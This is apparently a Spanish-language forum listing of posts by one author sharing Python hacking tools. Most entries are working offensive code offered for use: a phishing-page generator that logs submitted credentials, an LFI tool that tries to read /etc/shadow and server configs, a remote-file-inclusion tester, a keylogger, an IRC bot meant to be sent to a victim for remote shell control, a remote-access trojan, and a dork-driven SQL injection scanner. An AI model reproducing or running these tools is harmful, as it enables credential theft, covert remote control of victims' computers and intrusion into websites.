|
511
|
Programación / Scripting / [Python] RFI Tester
|
en: 7 Octubre 2011, 01:39 am
|
Hola a todos. Acabo de hacer un simple verificador de vulnerabilidad RFI #!usr/bin/python #RFI Tester (C) Doddy Hackman import os,sys,urllib2,re def header() : print "\n--== RFI Tester ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : return urllib2.urlopen(web).read() def test(web): try: print "\n[+] Testing vulnerability RFI in",web code = toma(web+"http://www.supertangas.com") if(re.findall("Los mejores TANGAS de la red",code,re.I)): print "[+] RFI Detected" else: print "[-] RFI Not Found" except: pass header() if len(sys.argv) != 2 : show() else : test(sys.argv[1]) copyright() #The End
Ejemplo de uso python rfi.py http://127.0.0.1/rfi.php?index=
C:\Users\DoddyH\Desktop\Arsenal X parte 2>rfi.py http://127.0.0.1/rfi.php?index=
--== RFI Tester ==--
[+] Testing vulnerability RFI in http://127.0.0.1/rfi.php?index= [+] RFI Detected
(C) Doddy Hackman 2010
|
|
|
512
|
Programación / Scripting / [Python] Phising Gen By Doddy H
|
en: 7 Octubre 2011, 01:39 am
|
Hola a todos Acabo de terminar esta tool en python para generar los fakes o phising (si es que asi se escribe) No me dedico mucho a esa parte del hacking , pero hice esta cosa rara porque no tenia nada que hacer xDD. #!usr/bin/python #Phising Gen (C) Doddy Hackman import urllib2,sys,os def savefile(filename,text): file = open(filename,"w") file.write(text) def header() : print "\n\n--== Phising Gen ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web> <filename>\n" def toma(web) : return urllib2.urlopen(web).read() def gen(web,new): try: print "\n[+] Working in the phishing" code = toma(web) text ='<?php $file = fopen("dump.txt", "a");foreach($_POST as $uno => $dos) {fwrite($file, $uno."=".$dos."\r\n");}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres."=".$cuatro."\r\n");}fclose($file);?>' print "[+] The fake was save in",new savefile(new,code+"\n\n"+text) except: pass header() if len(sys.argv) != 3 : show() else : gen(sys.argv[1],sys.argv[2]) copyright() #The End
Ejemplo de uso C:/Users/DoddyH/Desktop/Arsenal X parte 2>phising.py http://127.0.0.1/login.php yeah.php
--== Phising Gen ==--
[+] Working in the phishing [+] The fake was save in yeah.php
(C) Doddy Hackman 2010
|
|
|
513
|
Programación / Scripting / [Python] LFI T00l
|
en: 7 Octubre 2011, 01:38 am
|
Hola a todos. Acabo de terminar una tool para testear una vulnerabilidad LFI , si la pagina es vulnerable entonces el script automaticamente intenta brutear archivos. #!usr/bin/perl #LFI T00l (C) Doddy Hackman import os,sys,urllib2,re files = ['../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_l
og','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc'] def header() : print "\n--== LFI T00l ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : return urllib2.urlopen(web).read() def fuzz(web): print "\n[+] Fuzzing files...\n" for file in files: code = toma(web+file) if not (re.findall("No such file or directory in",code)): print "[File Found] : ",web,file def test(web): try: print "\n[+] Testing vulnerability LFI in",web code = toma(web+"'") if(re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)): fpd = re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I) print "\n[+] LFI Detected" print "[+] 
Full Path discloure : ",fpd[0] fuzz(web) else: print "[-] LFI Not Found" except: pass header() if len(sys.argv) != 2 : show() else : test(sys.argv[1]) copyright() #The End
Ejemplo de uso python lfi.py http://127.0.0.1/lfi.php?file=
C:\Users\DoddyH\Desktop\Arsenal X parte 2>lfi.py http://127.0.0.1/lfi.php?file=
--== LFI T00l ==--
[+] Testing vulnerability LFI in http://127.0.0.1/lfi.php?file=
[+] LFI Detected [+] Full Path discloure : C:\xampp\htdocs\lfi.php
[+] Fuzzing files...
(C) Doddy Hackman 2010
|
|
|
514
|
Programación / Scripting / [Python] Simple Keylogger
|
en: 7 Octubre 2011, 01:38 am
|
Un simple keylogger en Python #!usr/bin/python #Simple Keylogger in Python #(C) Doddy Hackman 2011 import pyHook,pythoncom def savefile(name,text): file = open(name,"a") file.write(text+"\n") file.close() def toma(frase): savefile("logs.txt",frase.Key) def capturar(): nave = pyHook.HookManager() nave.KeyDown = toma nave.HookKeyboard() pythoncom.PumpMessages() while 1: capturar() # The End
|
|
|
515
|
Programación / Scripting / [Python] IRC Bot
|
en: 7 Octubre 2011, 01:37 am
|
Hola a todos. Aca les traigo un IRC Bot en Python para poder usar como servidor oculto y mandarselo a una victima para poder controlarla desde un comando canal IRC El comando clave para mandar comandos que despues se muestra el resultado de comando en el chat es #!usr/bin/python #Insane Bot (C) Doddy Hackman 2011 #Version beta 0.00001 import re,socket import subprocess host = "127.0.0.1" canal = "#locos" nick = "bot" irc = socket.socket() try: irc.connect((host,6667)) irc.send("NICK "+nick+"\r\n") irc.send("USER "+nick+" 1 1 1 1\r\n") irc.send("JOIN "+canal+"\r\n") print "[+] Insane Bot Online\n" while 1: code = irc.recv(9999) if re.findall("PING",code): irc.send("PONG "+code.split()[1]+"\r\n") if re.findall("PRIVMSG",code): nick = code.split("!") nick = nick[0].replace(":","") msg = code.split(":")[2:][0] if re.findall("cmdnow",code): cmd = code.split("cmdnow")[1] irc.send("PRIVMSG "+canal+" : [+] Loading command : "+cmd+"\n") rea = subprocess.Popen(cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE) if rea: re1 = rea.stdout.read() total = re1.replace("\n","|") irc.send("PRIVMSG "+canal+" : "+total+"\n") else: re2 = rea.stderr.read() total = re2.replace("\n","|") irc.send("PRIVMSG "+canal+" : "+total+"\n") except: print "\n\n[-] Error\n\n" # The End
|
|
|
516
|
Programación / Scripting / [Python] HTTP Console By Doddy H
|
en: 7 Octubre 2011, 01:37 am
|
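#!/usr/bin/python
# Console (C) Doddy Hackman 2011
"""HTTP Console: a small Tk window that sends one line of text to a host.

The text typed in "Command" is sent to TCP port 80 of the host typed in
"Host", and the first bytes of the reply are shown in the text panel.
Written for Python 2 (Tkinter module name, byte strings on the socket).
"""
import socket
import Tkinter as tk

HTTP_PORT = 80          # plain HTTP only; traffic is not encrypted
REPLY_LIMIT = 666       # at most this many bytes of the reply are read
TIMEOUT_SECONDS = 10    # keeps the GUI from hanging on a silent host


def execa():
    """Send the command line to the host and display the reply.

    Runs as the button callback. Connection, send and receive errors are
    reported in the panel instead of being raised into the Tk event loop,
    and the socket is closed on every path.
    """
    conn = None
    try:
        # create_connection applies the timeout to connect and to later I/O.
        conn = socket.create_connection((str(host.get()), HTTP_PORT),
                                        TIMEOUT_SECONDS)
        # A single CRLF is appended, as before; a request that needs
        # headers and a terminating blank line must be typed accordingly.
        conn.sendall(cmd.get()+"\r\n")
        data = conn.recv(REPLY_LIMIT)
    except socket.error as err:
        panel.insert(tk.END, "[-] Error : "+str(err)+"\n")
        return
    finally:
        if conn is not None:
            conn.close()
    # repr() keeps control characters in the untrusted reply from being
    # interpreted by the text widget.
    panel.insert(tk.END, repr(data))


window = tk.Tk()
window.title("HTTP Console (C) Doddy Hackman 2011")
window.maxsize(width="400",height="350")
window.minsize(width="400",height="350")
window.configure(background="black")
window.configure(cursor="tcross")

host = tk.StringVar()
cmd = tk.StringVar()

panel = tk.Text(window,width=30,height=15,bg="black",fg="red")

tk.Label(window,bg="black").grid(row=3)
tk.Label(window,text="Host : ",bg="black",fg="red").grid(row=4,column=4)
tk.Entry(window,width=35,textvariable=host,bg="black",fg="red").grid(row=4,column=5)
tk.Label(window,text="Command : ",bg="black",fg="red").grid(row=8,column=4)
tk.Entry(window,width=35,textvariable=cmd,bg="black",fg="red").grid(row=8,column=5)
tk.Button(text="Cargar",bg="black",fg="red",activebackground="red",command=execa).grid(row=8,column=9)
tk.Label(window,bg="black").grid(row=19)
panel.grid(row=20,column=5)

window.mainloop()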
|
|
|
517
|
Programación / Scripting / [Python] HellRat By Doddy H
|
en: 7 Octubre 2011, 01:37 am
|
Hola , aca traigo un troyano en python con las siguientes opciones - Ocultar inicio
- Mostrar inicio
- Ocultar barra de tareas
- Mostrar barra de tareas
- Abrir CD
- Cerrar CD
- Ejecutar comandos
- Mostrar informacion
server.py #!usr/bin/python #Hell RAt (C) Doddy Hackman 2011 import socket,os,re,win32api,win32gui,win32con,ctypes,subprocess print "\n\n[+] Online\n\n" slave = socket.socket() slave.bind(("",666)) slave.listen(999) a,b = slave.accept() while True: rex = a.recv(20) if re.findall("getso",rex): z = os.name a.send(z) if re.findall("getpath",rex): h = os.getcwd() a.send(h) if re.findall("ocultarinicio",rex): x = win32gui.FindWindow("Shell_TrayWnd","") win32gui.ShowWindow(x,win32con.SW_HIDE) elif re.findall("mostrarinicio",rex): x = win32gui.FindWindow("Shell_TrayWnd","") win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL) elif re.findall("ocultaricono",rex): x = win32gui.FindWindow(0,"Program Manager") win32gui.ShowWindow(x,win32con.SW_HIDE) elif re.findall("mostraricono",rex): x = win32gui.FindWindow(0,"Program Manager") win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL) elif re.findall("abrircd",rex): ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door open", None, 0, None) elif re.findall("cerrarcd",rex): ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door closed", None, 0, None) else: rea = subprocess.Popen(rex,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE) if re: a.send(rea.stdout.read()) else: a.send(rea.stderr.read()) # The End
cliente.py #!usr/bin/python #HellRat (C) Doddy Hackman 2011 import os,socket,sys def head(): print "\n\n-- == hELLrAT == --\n\n" def copyright(): print "\n\n(C) Doddy Hackman 2011\n\n" def clean(): if sys.platform=="win32": os.system("cls") else: os.system("clear") def men(): try: ip = raw_input("[+] IP : ") client = socket.socket() client.connect((ip,666)) while True: clean() print "\n\n[+] Welcome to ",ip,"\n\n" print "\n\n[1] Informacion" print "[2] CMD" print "[3] Abrir CD" print "[4] Cerrar CD" print "[5] Ocultar iconos" print "[6] Mostrar iconos" print "[7] Ocultar barra de tareas" print "[8] Mostrar barra de tareas" print "[9] Cambiar IP" print "[10] Salir" op = input("\n\n[Opcion] : ") if op == 1: print "\n\n[+] Informacion\n\n" client.send("getso") so = client.recv(999) client.send("getpath") path = client.recv(999) print "[+] SO : "+so print "[+] Path : "+path raw_input() if op == 2: cmd = raw_input("\n[CMD] : ") client.send(cmd) code = client.recv(999) print code raw_input() if op == 3: client.send("abrircd") if op == 4: client.send("cerrarcd") if op == 5: client.send("ocultaricono") if op == 6: client.send("mostraricono") if op == 7: client.send("ocultarinicio") if op == 8: client.send("mostrarinicio") if op == 9: men() if op == 10: client.close() copyright() raw_input() sys.exit(1) except: print "\n\n[-] Error\n\n" head() men() # The End
|
|
|
518
|
Programación / Scripting / [Python] Google Inyector By dODDY h
|
en: 7 Octubre 2011, 01:36 am
|
Bueno , acabo de hacer un scanner de sqli. Este busca en google paginas con un dork marcado por ustedes , para despues borrar repetidos y scanear las webs encontradas #!usr/bin/python #Google Iny (C) Doddy Hackman 2011 import urllib2,re,os,sys def head(): print "\n\n -- == Google Iny == --\n" def copyright(): print "\n(C) Doddy Hackman 2011\n" sys.exit(1) def toma(web) : nave = urllib2.Request(web) nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5'); op = urllib2.build_opener() return op.open(nave).read() def show(): print "\n[+] Sintax : ",sys.argv[0]," <dork> <count>\n" def limpiar(pag): limpia = [] for p in pag: if not (re.findall("http://www.google.com.ar",p,re.I)): if p not in limpia: limpia.append(p) return limpia def sql(webs): for web in webs : if re.findall("=",web): web = re.split("=",web) web = web[0]+"=" try: code = toma(web+"-1+union+select+1--") if (re.findall("The used SELECT statements have a different number of columns",code,re.I)): print "[SQLI] : ",web,"\n" except: pass def scan(dork,count): pag = [] s = 10 while s <= int(count): try: code = toma("http://www.google.com.ar/search?hl=&q="+str(dork)+"&start="+repr(s)) d = re.findall("(?<=\"r\"><. href=\")[^\"]+",code) s += 10 for a in d: pag.append(a) except: copyright() pag = limpiar(pag) return pag head() if len(sys.argv) != 3: show() else : print "\n[+] SQL Scan Started\n" print "[+] Dork : ",sys.argv[1] print "[+] Count : ",sys.argv[2] pages = scan(sys.argv[1],sys.argv[2]) print "\n[+] Webs Found : ",len(pages),"\n" sql(pages) copyright()
|
|
|
519
|
Programación / Scripting / [Python] Fuzz DNS By Doddy H
|
en: 7 Octubre 2011, 01:34 am
|
Hola a todos. Aca les dejo un simple buscador de dns , solo ponen el dominio y esta cosita se encarga de buscarlas. #!usr/bin/python #LFI T00l (C) Doddy Hackman import os,sys,urllib2,re dns = ['www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc'] def header() : print "\n--== Fuzz DNS ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : 
return urllib2.urlopen(web).read() def search(web): print "\n[+] Searching DNS in",web,"\n" try: for d in dns: toma("http://"+d+"."+web) print "[DNS Link] : http://"+d+"."+web except: pass header() if len(sys.argv) != 2 : show() else : search(sys.argv[1]) copyright() #The End
Ejemplo de uso C:/Users/dODDYh/Desktop/Arsenal X parte 2>fuzzdns.py google.com
--== Fuzz DNS ==--
[+] Searching DNS in google.com
[DNS Link] : http://www.google.com
(C) Doddy Hackman 2010
|
|
|
520
|
Programación / Scripting / [Python] FTP Manager
|
en: 7 Octubre 2011, 01:34 am
|
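#!/usr/bin/python
# FTP Manager 0.2 (C) Doddy Hackman 2011
"""Simple interactive FTP client (Python 2).

Usage: <script> <host> <user> <pass>

The password is taken from the command line and the session uses plain
FTP, so the credentials are visible in the process list and shell history
and cross the network unencrypted.
"""
from ftplib import FTP, all_errors
import sys


def head():
    """Print the program banner."""
    print "\n -- == FTP Manger == --\n\n"


def copyright():
    """Print the credit line and end the process with exit status 1."""
    print "\n\n(C) Doddy Hackman 2011\n"
    sys.exit(1)


def show():
    """Print the expected command-line syntax."""
    print "\nSintax : "+sys.argv[0]+" <host> <user> <pass>\n"


def menu():
    """Print the option list and return the chosen option as an int.

    Returns None when the answer is not a number, which the caller treats
    as an unknown option and asks again.
    """
    print "\n"
    print "1 : dir"
    print "2 : cwd"
    print "3 : chdir"
    print "4 : delete dir"
    print "5 : delete file"
    print "6 : rename file"
    print "7 : make directory"
    print "8 : size"
    print "9 : abort\n\n"
    # raw_input + int() rather than input(): in Python 2, input() evaluates
    # the typed text as a Python expression.
    answer = raw_input("[Option] : ")
    try:
        return int(answer)
    except ValueError:
        return None


def enter(host,user,password):
    """Log in to *host* and serve menu choices until option 9 is picked.

    The menu runs in a loop rather than by recursion, so the call stack
    does not grow with every operation and the exit raised by option 9 is
    not swallowed by an enclosing handler. FTP and network errors are
    reported and the menu is shown again. Returns without a session when
    the login fails.
    """
    print "[+] Connecting to ",host,"\n"
    try:
        ftp = FTP(host,user,password)
    except all_errors as err:
        print "\n[-] Connection failed : ",err,"\n"
        return
    print "\n[+] Enter in the system\n"

    while True:
        op = menu()

        if op == 9:
            try:
                ftp.quit()
            except all_errors:
                # The server may already be gone; drop the socket anyway.
                ftp.close()
            copyright()

        try:
            if op == 1:
                # FTP.dir() prints the listing itself and returns None.
                ftp.dir()
            elif op == 2:
                print "\n\n[+] Path : "+ftp.pwd()+"\n\n"
            elif op == 3:
                path = raw_input("\n\n[Directory] : ")
                ftp.cwd(path)
                print "\n\n[+] Directory Changed\n\n"
            elif op == 4:
                path = raw_input("\n\n[Directory] : ")
                ftp.rmd(path)
                print "\n\n[+] Directory Deleted\n\n"
            elif op == 5:
                name = raw_input("\n\n[File] : ")
                ftp.delete(name)
                print "\n\n[+] File Deleted\n\n"
            elif op == 6:
                oldfile = raw_input("\n\n[Name] : ")
                newfile = raw_input("\n[New Name] : ")
                ftp.rename(oldfile,newfile)
                print "\n\n[+] Name Changed\n\n"
            elif op == 7:
                path = raw_input("\n\n[New Directory] : ")
                ftp.mkd(path)
                print "\n\n[+] Directory Created\n\n"
            elif op == 8:
                name = raw_input("\n\n[File] : ")
                peso = ftp.size(name)
                # SIZE reports bytes, not kilobytes.
                print "\n\n[+] ",peso," bytes \n\n"
            # Any other value falls through and the menu is shown again.
        except all_errors as err:
            print "\n\n[-] FTP error : ",err,"\n\n"


head()

if len(sys.argv) != 4:
    show()
else:
    enter(sys.argv[1],sys.argv[2],sys.argv[3])

copyright()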